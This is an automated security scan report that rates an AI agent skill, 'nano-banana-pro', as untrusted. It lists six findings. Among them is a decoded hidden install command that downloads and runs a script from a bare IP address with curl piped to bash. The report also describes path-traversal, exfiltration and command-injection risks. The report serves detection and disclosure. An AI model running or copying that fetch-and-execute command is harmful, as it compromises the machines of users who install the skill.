Trust Assessment
nano-banana-pro received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 6 findings: 2 critical, 1 high, 2 medium, and 1 low severity. Key findings include Obfuscated execution: base64 decode to shell, Arbitrary Code Execution via Base64 Encoded Script, Potential Data Exfiltration via Arbitrary Input File Paths.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 39/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings6
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-banana-pro-ptnlkl/SKILL.md:10 | |
| CRITICAL | Arbitrary Code Execution via Base64 Encoded Script The MacOS installation instructions include a command that decodes a base64 string and pipes its output directly to 'bash'. The decoded string is '/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"'. This downloads and executes an arbitrary script from an unverified IP address (91.92.242.30) without any user review or security checks. This constitutes a severe supply chain risk and allows for arbitrary command injection and hidden instructions, potentially leading to full system compromise. Remove the base64 encoded command. If an external dependency is required, provide clear, auditable installation instructions using official package managers or trusted sources. Do not recommend downloading and executing scripts directly from unverified URLs. | LLM | SKILL.md:14 | |
| HIGH | Potential Data Exfiltration via Arbitrary Input File Paths The skill allows users to specify an arbitrary path for the '--input-image' argument. The instruction 'test -f "path/to/input.png"' confirms the skill expects to read files from user-provided paths. If the 'generate_image.py' script reads the content of this file and sends it to an external API (e.g., Gemini 3 Pro Image API), and the user provides a non-image sensitive file, its content could be exfiltrated. This grants excessive permissions to read arbitrary files on the system. Implement strict validation and sanitization of input file paths within 'generate_image.py' to prevent directory traversal and ensure only image files are processed. Consider sandboxing the skill's file access or restricting input paths to a designated safe directory. Ensure the image processing API strictly validates input as image data and does not process arbitrary file contents. | LLM | SKILL.md:98 | |
| MEDIUM | Potential Command Injection via User-Controlled Filename The '--filename' argument is user-controlled and can include a path. The skill instructs the LLM to generate filenames based on user prompts. If the 'generate_image.py' script does not properly sanitize the filename argument, an attacker could use path traversal sequences (e.g., '../../sensitive_file.png') to write to arbitrary locations on the filesystem or overwrite existing files. This could lead to data corruption or further command injection if executable files are overwritten. Implement robust sanitization of the '--filename' argument within 'generate_image.py' to prevent path traversal. Restrict output files to a designated safe directory or ensure filenames are strictly alphanumeric with allowed extensions. | LLM | SKILL.md:77 | |
| MEDIUM | Potential Prompt Injection leading to Command Injection The skill explicitly states to 'Pass user's image description as-is to `--prompt`'. If the underlying 'generate_image.py' script uses this prompt argument in a shell command without proper escaping or sanitization (e.g., via 'subprocess.run(..., shell=True)'), a malicious user prompt could inject arbitrary shell commands, leading to command injection. Ensure that 'generate_image.py' processes the '--prompt' argument securely. If shell execution is necessary, use 'subprocess.run' with 'shell=False' and pass arguments as a list, or meticulously escape all user-controlled input before passing it to a shell command. | LLM | SKILL.md:112 | |
| LOW | API Key Exposure via Command-Line Argument The skill allows passing the API key directly as a command-line argument ('--api-key KEY'). While this is a design choice, it can expose the API key in shell history, process lists, or logs, making it vulnerable to credential harvesting by other processes or users on the same system. Environment variables ('GEMINI_API_KEY') are a more secure method for handling sensitive credentials. Strongly recommend using environment variables (e.g., 'GEMINI_API_KEY') for API keys. If command-line arguments are necessary, advise users about the security implications and suggest using temporary, short-lived credentials where possible. | LLM | SKILL.md:59 |
Scan History
Embed Code
[](https://skillshield.io/report/6b197bed69af3405)
Powered by SkillShield